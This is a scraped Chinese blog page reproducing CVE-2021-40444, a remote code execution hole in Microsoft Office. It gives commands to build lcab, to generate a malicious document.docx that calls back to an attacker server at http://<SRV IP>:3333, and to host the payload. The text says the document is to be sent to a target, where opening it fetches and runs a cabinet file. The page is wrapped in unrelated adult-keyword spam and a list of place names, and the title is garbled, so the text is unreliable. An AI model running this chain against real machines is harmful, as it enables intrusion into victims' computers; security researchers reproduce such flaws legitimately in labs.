欧美精品123_精品露脸国产偷人在视频_日韩美女免费线视频_成人av三级

2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復(fù)現(xiàn)(2021年的微博之夜的king和queen是誰)

本文的標(biāo)題是《2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復(fù)現(xiàn)》來源于:由作者:陳鵬羽采編而成,主要講述了項(xiàng)目地址在https://github.com/lo

項(xiàng)目地址在https://github.com/lockedbyte/CVE-2021-40444。先下載到kali里。

由于此項(xiàng)目必須使用lcab,所以我們先在kail里安裝一下。

wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install
which lcab
# 查看幫助信息
lcab –help


021年的word文檔還有漏洞,Office


021年的word文檔還有漏洞,Office


021年的word文檔還有漏洞,Office


021年的word文檔還有漏洞,Office

進(jìn)入下載后的CVE-2021-40444目錄里,執(zhí)行:

python3 exploit.py generate test/calc.dll http://<SRV IP>:3333


021年的word文檔還有漏洞,Office

看見“You can execute now the server and then send document.docx to target” 說明就可以了。

然后用python開一個(gè)http服務(wù),端口用剛剛設(shè)置的3333 或者自己設(shè)置的端口號(hào)。

sudo python3 exploit.py host 3333


021年的word文檔還有漏洞,Office

把CVE-2021-40444目錄里的子目錄out下的document.docx文件copy到虛擬機(jī)中執(zhí)行。

word打開后,可以看見這里在下載我們kali上的html文件。


021年的word文檔還有漏洞,Office


html又會(huì)下載calc.cab 文件執(zhí)行其中的命令,最后彈出計(jì)算器。


021年的word文檔還有漏洞,Office

服務(wù)端顯示的結(jié)果:


021年的word文檔還有漏洞,Office

021年的word文檔還有漏洞,Office
本文原作者為陳鵬羽,轉(zhuǎn)載請(qǐng)注明:出處!如該文有不妥之處,請(qǐng)聯(lián)系站長刪除,謝謝合作~

原創(chuàng)文章,作者:陳鵬羽,如若轉(zhuǎn)載,請(qǐng)注明出處:http://m.uuuxu.com/20220512315602.html

主站蜘蛛池模板: 汪清县| 泌阳县| 怀宁县| 夏邑县| 宁武县| 日喀则市| 西藏| 竹北市| 银川市| 芜湖县| 观塘区| 阳原县| 防城港市| 垫江县| 桓仁| 柏乡县| 三原县| 巴东县| 石家庄市| 阳泉市| 滨海县| 伽师县| 襄城县| 二连浩特市| 巫山县| 原阳县| 临沂市| 淮南市| 潮州市| 惠东县| 昭苏县| 台南市| 水城县| 石景山区| 广宗县| 新建县| 秦安县| 色达县| 体育| 泊头市| 巴彦淖尔市|